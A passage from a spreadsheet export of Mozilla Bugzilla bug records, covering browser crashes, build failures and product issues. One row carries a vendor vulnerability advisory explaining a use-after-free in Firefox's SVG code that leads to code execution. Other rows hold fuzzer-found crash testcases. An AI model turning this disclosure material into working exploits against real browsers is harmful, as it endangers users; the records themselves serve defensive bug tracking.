      <c r="B5435" t="inlineStr">
        <is>
          <t>2009-07-02 01:36:54 -0700</t>
        </is>
      </c>
      <c r="C5435" t="inlineStr">
        <is>
          <t>Crash [@ LazyGeneratePopupDone] with openPopup() and DOMAttrModified event handler removing window</t>
        </is>
      </c>
      <c r="D5435" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E5435" t="n">
        <v>1</v>
      </c>
      <c r="F5435" t="n">
        <v>1</v>
      </c>
      <c r="G5435" t="n">
        <v>3</v>
      </c>
      <c r="H5435" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5435" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5435" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K5435" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5435" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5435" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5435" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5435" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5435" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5435" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5435" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5435" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5435" t="n">
        <v>1</v>
      </c>
      <c r="U5435" t="n">
        <v>0</v>
      </c>
      <c r="V5435" t="n">
        <v>13</v>
      </c>
      <c r="W5435" t="inlineStr">
        <is>
          <t>Created attachment 386468
zipped up testcase
See zipped up testcase. To reproduce, open the file named 'Kopie van parentframe.htm'. After opening Mozilla crashes within 400ms.
It also crashes in Firefox 3.
http://crash-stats.mozilla.com/report/index/fb9fbb8f-537a-4a37-b9e6-f557b2090701?p=1
0  	xul.dll  	LazyGeneratePopupDone  	 layout/xul/base/src/nsMenuPopupFrame.cpp:578
1 	xul.dll 	nsCSSFrameConstructor::LazyGenerateChildrenEvent::Run 	layout/base/nsCSSFrameConstructor.cpp:11773
2 	xul.dll 	nsThread::ProcessNextEvent 	xpcom/threads/nsThread.cpp:527
3 	xul.dll 	nsBaseAppShell::Run 	widget/src/xpwidgets/nsBaseAppShell.cpp:170
4 	xul.dll 	nsAppStartup::Run 	toolkit/components/startup/src/nsAppStartup.cpp:193
5 	nspr4.dll 	PR_GetEnv 	
6 	firefox.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:110
7 	firefox.exe 	firefox.exe@0x21a7 	
8 	kernel32.dll 	kernel32.dll@0x17076 
Firefox 3 crash report (garbage, it seems):
http://crash-stats.mozilla.com/report/index/04487184-afa9-4932-8327-18c352090701
0  	 	@0x39e318f</t>
        </is>
      </c>
      <c r="X5435" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5436">
      <c r="A5436" t="n">
        <v>151122</v>
      </c>
      <c r="B5436" t="inlineStr">
        <is>
          <t>2002-06-12 01:15:59 -0700</t>
        </is>
      </c>
      <c r="C5436" t="inlineStr">
        <is>
          <t>Email prefs: Reporter / Owner messed up</t>
        </is>
      </c>
      <c r="D5436" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:30 -0800</t>
        </is>
      </c>
      <c r="E5436" t="n">
        <v>1</v>
      </c>
      <c r="F5436" t="n">
        <v>1</v>
      </c>
      <c r="G5436" t="n">
        <v>4</v>
      </c>
      <c r="H5436" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5436" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5436" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K5436" t="inlineStr">
        <is>
          <t>2.17</t>
        </is>
      </c>
      <c r="L5436" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5436" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5436" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5436" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5436" t="inlineStr"/>
      <c r="Q5436" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5436" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5436" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5436" t="n">
        <v>1</v>
      </c>
      <c r="U5436" t="n">
        <v>0</v>
      </c>
      <c r="V5436" t="n">
        <v>9</v>
      </c>
      <c r="W5436" t="inlineStr">
        <is>
          <t>On the email prefs page the assignee and owner columns have their labels (or
contents, whichever way you want to look at it) swapped. 
Patch incoming. Ccing Gerv for review, this is his code originally.</t>
        </is>
      </c>
      <c r="X5436" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5437">
      <c r="A5437" t="n">
        <v>1234425</v>
      </c>
      <c r="B5437" t="inlineStr">
        <is>
          <t>2015-12-21 18:33:28 -0800</t>
        </is>
      </c>
      <c r="C5437" t="inlineStr">
        <is>
          <t>Crash [@ js::jit::BaselineFrame::script]</t>
        </is>
      </c>
      <c r="D5437" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:00 -0700</t>
        </is>
      </c>
      <c r="E5437" t="n">
        <v>1</v>
      </c>
      <c r="F5437" t="n">
        <v>1</v>
      </c>
      <c r="G5437" t="n">
        <v>3</v>
      </c>
      <c r="H5437" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5437" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5437" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5437" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5437" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5437" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5437" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5437" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5437" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main45+]</t>
        </is>
      </c>
      <c r="Q5437" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5437" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5437" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T5437" t="n">
        <v>1</v>
      </c>
      <c r="U5437" t="n">
        <v>0</v>
      </c>
      <c r="V5437" t="n">
        <v>17</v>
      </c>
      <c r="W5437" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 388bdc46ba51 (build with --enable-gczeal --enable-optimize="-O2 -g" --enable-address-sanitizer --target=i686-pc-linux-gnu --without-intl-api --enable-posix-nspr-emulation --disable-jemalloc --disable-tests --disable-debug, run with --fuzzing-safe --thread-count=2 --baseline-eager --ion-extra-checks --ion-eager):
__defineGetter__("x", function() isFinite);
evaluate(`for (i=0;i&lt;1000000;++i) x`);
Backtrace:
==16531==ERROR: AddressSanitizer: SEGV on unknown address 0x000002a6 (pc 0x088768e8 sp 0xffce2710 bp 0xffce2738 T0)
    #0 0x88768e7 in js::jit::BaselineFrame::script() const js/src/jsscript.h:1235
    #1 0x88768e7 in js::jit::BaselineFrame::overridePc() const js/src/jit/BaselineFrame.h:377
    #2 0x88768e7 in js::jit::JitFrameIterator::baselineFrame() const js/src/jit/BaselineFrame.h:382
    #3 0x88768e7 in js::jit::JitFrameIterator::baselineScriptAndPc(JSScript**, unsigned char**) const js/src/jit/JitFrames.cpp:237
    #4 0x8885c3f in js::jit::GetPcScript(JSContext*, JSScript**, unsigned char**) js/src/jit/JitFrames.cpp:1683
    #5 0x8eebf39 in JSContext::currentScript(unsigned char**, JSContext::MaybeAllowCrossCompartment) const js/src/jscntxtinlines.h:462
    #6 0x8eebf39 in JSContext::findVersion() const js/src/jscntxt.cpp:1160
    #7 0x8f2440a in JS::CompileOptions::CompileOptions(JSContext*, JSVersion) js/src/jsapi.cpp:3885
    #8 0x918c6ad in CreateEmptyScriptForClone(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSScript*&gt;) js/src/jsscript.cpp:3642
    #9 0x918d47b in js::CloneScriptIntoFunction(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSFunction*&gt;, JS::Handle&lt;JSScript*&gt;) js/src/jsscript.cpp:3680
    #10 0x9666974 in JSRuntime::cloneSelfHostedFunctionScript(JSContext*, JS::Handle&lt;js::PropertyName*&gt;, JS::Handle&lt;JSFunction*&gt;) js/src/vm/SelfHosting.cpp:2069
    #11 0x8fe927c in JSFunction::createScriptForLazilyInterpretedFunction(JSContext*, JS::Handle&lt;JSFunction*&gt;) js/src/jsfun.cpp:1468
    #12 0x955829b in JSFunction::getOrCreateScript(JSContext*) js/src/jsfun.h:398
    #13 0x955829b in JSObject::makeLazyGroup(JSContext*, JS::Handle&lt;JSObject*&gt;) js/src/vm/ObjectGroup.cpp:310
    #14 0x9722dc9 in js::TypeSet::ObjectKey::singleton() js/src/jsobjinlines.h:136
    #15 0x9722dc9 in js::HeapTypeSetKey::instantiate(JSContext*) js/src/vm/TypeInference.cpp:1301
    #16 0x9751a3f in (anonymous namespace)::CompilerConstraintInstance&lt;(anonymous namespace)::ConstraintDataFreezeObjectFlags&gt;::generateTypeConstraint(JSContext*, js::RecompileInfo) js/src/vm/TypeInference.cpp:1193
    #17 0x97239fa in js::FinishCompilation(JSContext*, JS::Handle&lt;JSScript*&gt;, js::CompilerConstraintList*, js::RecompileInfo*, bool*) js/src/vm/TypeInference.cpp:1404
    #18 0x8654f37 in js::jit::CodeGenerator::link(JSContext*, js::CompilerConstraintList*) js/src/jit/CodeGenerator.cpp:8133
    #19 0x87f7ed5 in LinkCodeGen(JSContext*, js::jit::IonBuilder*, js::jit::CodeGenerator*, JS::MutableHandle&lt;js::TraceableVector&lt;JSScript*, 0u, js::TempAllocPolicy, js::DefaultGCPolicy&lt;JSScript*&gt; &gt; &gt;, OnIonCompilationInfo*) js/src/jit/Ion.cpp:566
    #20 0x86ca224 in LinkBackgroundCodeGen(JSContext*, js::jit::IonBuilder*, JS::MutableHandle&lt;js::TraceableVector&lt;JSScript*, 0u, js::TempAllocPolicy, js::DefaultGCPolicy&lt;JSScript*&gt; &gt; &gt;, OnIonCompilationInfo*) js/src/jit/Ion.cpp:588
    #21 0x86ca224 in js::jit::LazyLink(JSContext*, JS::Handle&lt;JSScript*&gt;) js/src/jit/Ion.cpp:614
    #22 0x86cafff in js::jit::LazyLinkTopActivation(JSContext*) js/src/jit/Ion.cpp:645
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV js/src/jsscript.h:1235 js::jit::BaselineFrame::script() const
==16531==ABORTING
This test crashes also regular builds, but it reproduces really bad there (&lt;1%). With a 32-bit ASan build, it almost always reproduces for me.</t>
        </is>
      </c>
      <c r="X5437" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5438">
      <c r="A5438" t="n">
        <v>491930</v>
      </c>
      <c r="B5438" t="inlineStr">
        <is>
          <t>2009-05-07 13:53:17 -0700</t>
        </is>
      </c>
      <c r="C5438" t="inlineStr">
        <is>
          <t>windows try server unittest build randomly red with error removing build directory</t>
        </is>
      </c>
      <c r="D5438" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5438" t="n">
        <v>1</v>
      </c>
      <c r="F5438" t="n">
        <v>1</v>
      </c>
      <c r="G5438" t="n">
        <v>5</v>
      </c>
      <c r="H5438" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5438" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5438" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5438" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5438" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5438" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5438" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5438" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5438" t="inlineStr"/>
      <c r="Q5438" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5438" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5438" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5438" t="n">
        <v>1</v>
      </c>
      <c r="U5438" t="n">
        <v>0</v>
      </c>
      <c r="V5438" t="n">
        <v>6</v>
      </c>
      <c r="W5438" t="inlineStr">
        <is>
          <t>Recently I've had two windows try server unittest builds fail with:
rm: cannot remove directory `mozilla/objdir/dist/bin': Directory not empty
rm: cannot remove directory `mozilla/objdir/dist': Directory not empty
rm: cannot remove directory `mozilla/objdir': Directory not empty
rm: cannot remove directory `mozilla': Directory not empty
The second of them was:
http://tinderbox.mozilla.org/showlog.cgi?log=MozillaTry/1241728905.1241728950.19335.gz
Having the windows unittest build go red randomly is bad... and it increases load on the try server if we have to resubmit jobs just to get that one result.</t>
        </is>
      </c>
      <c r="X5438" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5439">
      <c r="A5439" t="n">
        <v>815984</v>
      </c>
      <c r="B5439" t="inlineStr">
        <is>
          <t>2012-11-28 00:00:27 -0800</t>
        </is>
      </c>
      <c r="C5439" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.15 Beta 2</t>
        </is>
      </c>
      <c r="D5439" t="inlineStr">
        <is>
          <t>2012-12-06 22:49:52 -0800</t>
        </is>
      </c>
      <c r="E5439" t="n">
        <v>1</v>
      </c>
      <c r="F5439" t="n">
        <v>1</v>
      </c>
      <c r="G5439" t="n">
        <v>2</v>
      </c>
      <c r="H5439" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5439" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5439" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K5439" t="inlineStr">
        <is>
          <t>SeaMonkey 2.15 Branch</t>
        </is>
      </c>
      <c r="L5439" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5439" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5439" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5439" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5439" t="inlineStr"/>
      <c r="Q5439" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5439" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5439" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5439" t="n">
        <v>1</v>
      </c>
      <c r="U5439" t="n">
        <v>0</v>
      </c>
      <c r="V5439" t="n">
        <v>2</v>
      </c>
      <c r="W5439" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.15 Beta 2
We expect an actual release on Monday 3rd December.</t>
        </is>
      </c>
      <c r="X5439" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5440">
      <c r="A5440" t="n">
        <v>903491</v>
      </c>
      <c r="B5440" t="inlineStr">
        <is>
          <t>2013-08-09 09:15:35 -0700</t>
        </is>
      </c>
      <c r="C5440" t="inlineStr">
        <is>
          <t>[HD][Browser] Refresh icon appears to be in SD</t>
        </is>
      </c>
      <c r="D5440" t="inlineStr">
        <is>
          <t>2013-09-12 04:27:02 -0700</t>
        </is>
      </c>
      <c r="E5440" t="n">
        <v>1</v>
      </c>
      <c r="F5440" t="n">
        <v>1</v>
      </c>
      <c r="G5440" t="n">
        <v>6</v>
      </c>
      <c r="H5440" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5440" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J5440" t="inlineStr">
        <is>
          <t>Gaia::Browser</t>
        </is>
      </c>
      <c r="K5440" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5440" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5440" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N5440" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5440" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5440" t="inlineStr">
        <is>
          <t>helix vsd, HD</t>
        </is>
      </c>
      <c r="Q5440" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5440" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5440" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5440" t="n">
        <v>1</v>
      </c>
      <c r="U5440" t="n">
        <v>0</v>
      </c>
      <c r="V5440" t="n">
        <v>14</v>
      </c>
      <c r="W5440" t="inlineStr">
        <is>
          <t>Created attachment 788211
Browser - Refresh Icon.png
Pavel,
I'm not 100% sure, but I think the refresh icon is SD.  Can you take a look?  Let Amy know if a new graphic is needed.  Thanks!</t>
        </is>
      </c>
      <c r="X5440" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5441">
      <c r="A5441" t="n">
        <v>541116</v>
      </c>
      <c r="B5441" t="inlineStr">
        <is>
          <t>2010-01-21 08:19:19 -0800</t>
        </is>
      </c>
      <c r="C5441" t="inlineStr">
        <is>
          <t>Tabs displaying opened emails switch to other emails</t>
        </is>
      </c>
      <c r="D5441" t="inlineStr">
        <is>
          <t>2010-01-22 22:55:43 -0800</t>
        </is>
      </c>
      <c r="E5441" t="n">
        <v>1</v>
      </c>
      <c r="F5441" t="n">
        <v>1</v>
      </c>
      <c r="G5441" t="n">
        <v>6</v>
      </c>
      <c r="H5441" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5441" t="inlineStr">
        <is>
          <t>Penelope Graveyard</t>
        </is>
      </c>
      <c r="J5441" t="inlineStr">
        <is>
          <t>Mail Window</t>
        </is>
      </c>
      <c r="K5441" t="inlineStr">
        <is>
          <t>0.5</t>
        </is>
      </c>
      <c r="L5441" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5441" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5441" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5441" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5441" t="inlineStr"/>
      <c r="Q5441" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5441" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5441" t="inlineStr">
        <is>
          <t>Eudora OSE 1.0</t>
        </is>
      </c>
      <c r="T5441" t="n">
        <v>1</v>
      </c>
      <c r="U5441" t="n">
        <v>0</v>
      </c>
      <c r="V5441" t="n">
        <v>5</v>
      </c>
      <c r="W5441" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.38 Safari/532.0
Build Identifier: Eudora 8.0b8
Greetings,
Since Eudora 8 beta 7, I've had problems with emails opened in tabs.  Say that I open emails A, B, C in tabs, then quit Eudora (completely).  When I would re-open Eudora, only email A might still be open; or emails A, B, C, D, E might be open.
In Eudora 8 beta 8, this is a lot worse.  Say that I have emails A and B open in tabs.  When I close the tab of email B, email B appears in the tab of email A!  At times it's more random: closing a tab causes a random (recent) email to appear in the next tab to be brought forward.
Essentially, tabs are now unusable.  I miss Eudora 7 which allowed me to leave 25 emails open, minimized at the bottom of the mail window, for further attention.  They would always re-appear, even after a crash, in the same order.
Thank you,
Jean-Francois
Reproducible: Always
I played around with the tabs options in the 'Penelope' part of Eudora's 'Options...', but I couldn't solve the problem.</t>
        </is>
      </c>
      <c r="X5441" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5442">
      <c r="A5442" t="n">
        <v>648094</v>
      </c>
      <c r="B5442" t="inlineStr">
        <is>
          <t>2011-04-06 13:24:11 -0700</t>
        </is>
      </c>
      <c r="C5442" t="inlineStr">
        <is>
          <t>Mozilla Firefox SVGTextElement.getCharNumAtPosition Remote Code Execution Vulnerability (ZDI-CAN-1143)</t>
        </is>
      </c>
      <c r="D5442" t="inlineStr">
        <is>
          <t>2011-09-26 23:44:07 -0700</t>
        </is>
      </c>
      <c r="E5442" t="n">
        <v>1</v>
      </c>
      <c r="F5442" t="n">
        <v>1</v>
      </c>
      <c r="G5442" t="n">
        <v>3</v>
      </c>
      <c r="H5442" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5442" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5442" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5442" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5442" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5442" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5442" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5442" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5442" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q5442" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5442" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5442" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5442" t="n">
        <v>1</v>
      </c>
      <c r="U5442" t="n">
        <v>0</v>
      </c>
      <c r="V5442" t="n">
        <v>41</v>
      </c>
      <c r="W5442" t="inlineStr">
        <is>
          <t>Created attachment 524245
PoC
ZDI-CAN-1143: Mozilla Firefox SVGTextElement.getCharNumAtPosition Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
    Mozilla Firefo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code responsible for parsing SVG text containers. The code within nsSVGGlyphFrame::GetCharNumAtPosition()
does not account for user defined getter methods modifying or destroying the parent object. An attacker can abuse this flaw to create a dangling
pointer which is referenced during the traversal of the SVG container hierarchy. This can be leveraged to execute arbitrary code within the context of the browser.
Version(s)  tested: 3.6.13
Platform(s) tested: Win XP SP3
From content/svg/content/src/nsSVGTextContentElement.cpp:
NS_IMETHODIMP
nsSVGTextContentElement::GetCharNumAtPosition(nsIDOMSVGPoint *point,
PRInt32 *_retval) {
  ...
  nsSVGTextContainerFrame* metrics = GetTextContainerFrame();
  if (metrics)
    *_retval = metrics-&gt;GetCharNumAtPosition(point);
  return NS_OK;
}
From layout/svg/base/src/nsSVGTextContainerFrame.cpp:
nsSVGTextContainerFrame::GetCharNumAtPosition(nsIDOMSVGPoint *point) {
  PRInt32 index = -1;
  PRInt32 offset = 0;
  nsISVGGlyphFragmentNode *node = GetFirstGlyphFragmentChildNode();
  while (node) {
    PRUint32 count = node-&gt;GetNumberOfChars();
    if (count &gt; 0) {
      PRInt32 charnum = node-&gt;GetCharNumAtPosition(point);
      if (charnum &gt;= 0) {
        index = charnum + offset;
      }
      offset += count;
      // Keep going, multiple characters may match 
      // and we must return the last one
    }
    node = GetNextGlyphFragmentChildNode(node);
  }
  return index;
}
And later we reach layout/svg/base/src/nsSVGGlyphFrame.cpp:
nsSVGGlyphFrame::GetCharNumAtPosition(nsIDOMSVGPoint *point) {
  float xPos, yPos;
  point-&gt;GetX(&amp;xPos);
  point-&gt;GetY(&amp;yPos);
  nsRefPtr&lt;gfxContext&gt; tmpCtx = MakeTmpCtx();
  CharacterIterator iter(this, PR_FALSE);
  ...
}
Note that |point-&gt;GetX(&amp;xPos)| will execute user provided implementation of 'x' property getter (as specified in interface nsIDOMSVGPoint). At that moment we can remove our SVGTextElement nodes and all the related frames will be deleted as well.
CharacterIterator::CharacterIterator(nsSVGGlyphFrame *aSource,
        PRBool aForceGlobalTransform)
  : mSource(aSource), mCurrentAdvance(0), mCurrentChar(-1),
    mInError(PR_FALSE)
{
  if (!aSource-&gt;EnsureTextRun(&amp;mDrawScale, &amp;mMetricsScale,
                              aForceGlobalTransform) ||
      !aSource-&gt;GetCharacterPositions(&amp;mPositions, mMetricsScale)) {
    mInError = PR_TRUE;
  }
}
nsSVGGlyphFrame::EnsureTextRun(float *aDrawScale, float *aMetricsScale,
                               PRBool aForceGlobalTransform) {
  // Compute the size at which the text should render (excluding the
CTM)
  const nsStyleFont* fontData = GetStyleFont();
  ...
}
And here we reach a dangling pointer.
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X5442" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5443">
      <c r="A5443" t="n">
        <v>451605</v>
      </c>
      <c r="B5443" t="inlineStr">
        <is>
          <t>2008-08-21 12:11:30 -0700</t>
        </is>
      </c>
      <c r="C5443" t="inlineStr">
        <is>
          <t>TM: Crash during GC due to a bogus fp-&gt;thisp</t>
        </is>
      </c>
      <c r="D5443" t="inlineStr">
        <is>
          <t>2008-09-19 19:01:56 -0700</t>
        </is>
      </c>
      <c r="E5443" t="n">
        <v>1</v>
      </c>
      <c r="F5443" t="n">
        <v>1</v>
      </c>
      <c r="G5443" t="n">
        <v>3</v>
      </c>
      <c r="H5443" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5443" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5443" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5443" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5443" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5443" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5443" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5443" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5443" t="inlineStr"/>
      <c r="Q5443" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5443" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5443" t="inlineStr">
        <is>
          <t>mozilla1.9.1b1</t>
        </is>
      </c>
      <c r="T5443" t="n">
        <v>1</v>
      </c>
      <c r="U5443" t="n">
        <v>0</v>
      </c>
      <c r="V5443" t="n">
        <v>33</v>
      </c>
      <c r="W5443" t="inlineStr">
        <is>
          <t>﻿#1  0x00228335 in JS_CallTracer (trc=0xbfffa8d4, thing=0x4b0, kind=0) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/js/src/jsgc.cpp:2524
2524	    flagp = GetGCThingFlags(thing);
#2  0x002290da in js_TraceStackFrame (trc=0xbfffa8d4, fp=0x14b377c) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/js/src/jsgc.cpp:2720
2720	    JS_CALL_VALUE_TRACER(trc, (jsval)fp-&gt;thisp, "this");
$7 = {
  regs = 0xbfffb458, 
  slots = 0x14b37ec, 
  callobj = 0x0, 
  argsobj = 0x0, 
  varobj = 0x0, 
  callee = 0x7d8eea8, 
  script = 0x9270b10, 
  fun = 0x7d8eea8, 
  thisp = 0x4b0, 
  argc = 0x1, 
  argv = 0x14b3764, 
  rval = 0x16, 
  down = 0x14b36b8, 
  annotation = 0x0, 
  scopeChain = 0x7d88ec0, 
  sharpDepth = 0x0, 
  sharpArray = 0x0, 
  flags = 0x0, 
  dormantNext = 0x0, 
  xmlNamespace = 0x0, 
  blockChain = 0x0, 
  displaySave = 0x14b36b8, 
  pcDisabledSave = 0x0
}
﻿
#0  0x00226994 in GetGCThingFlags (thing=0x4b0) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/js/src/jsgc.cpp:1082
	a = (JSGCArenaInfo *) 0xff0
	index = 228604640
#1  0x00228335 in JS_CallTracer (trc=0xbfffa8d4, thing=0x4b0, kind=0) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/js/src/jsgc.cpp:2524
	rt = (JSRuntime *) 0x1058200
	a = (JSGCArenaInfo *) 0xd79dff0
	cx = (JSContext *) 0xda03ae0
	index = 500
	flagp = (uint8 *) 0x2285a7 ";E\020t D$\b\t"
#2  0x002290da in js_TraceStackFrame (trc=0xbfffa8d4, fp=0x14b377c) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/js/src/jsgc.cpp:2720
	nslots = 7
	minargs = 46078336
	skip = 0
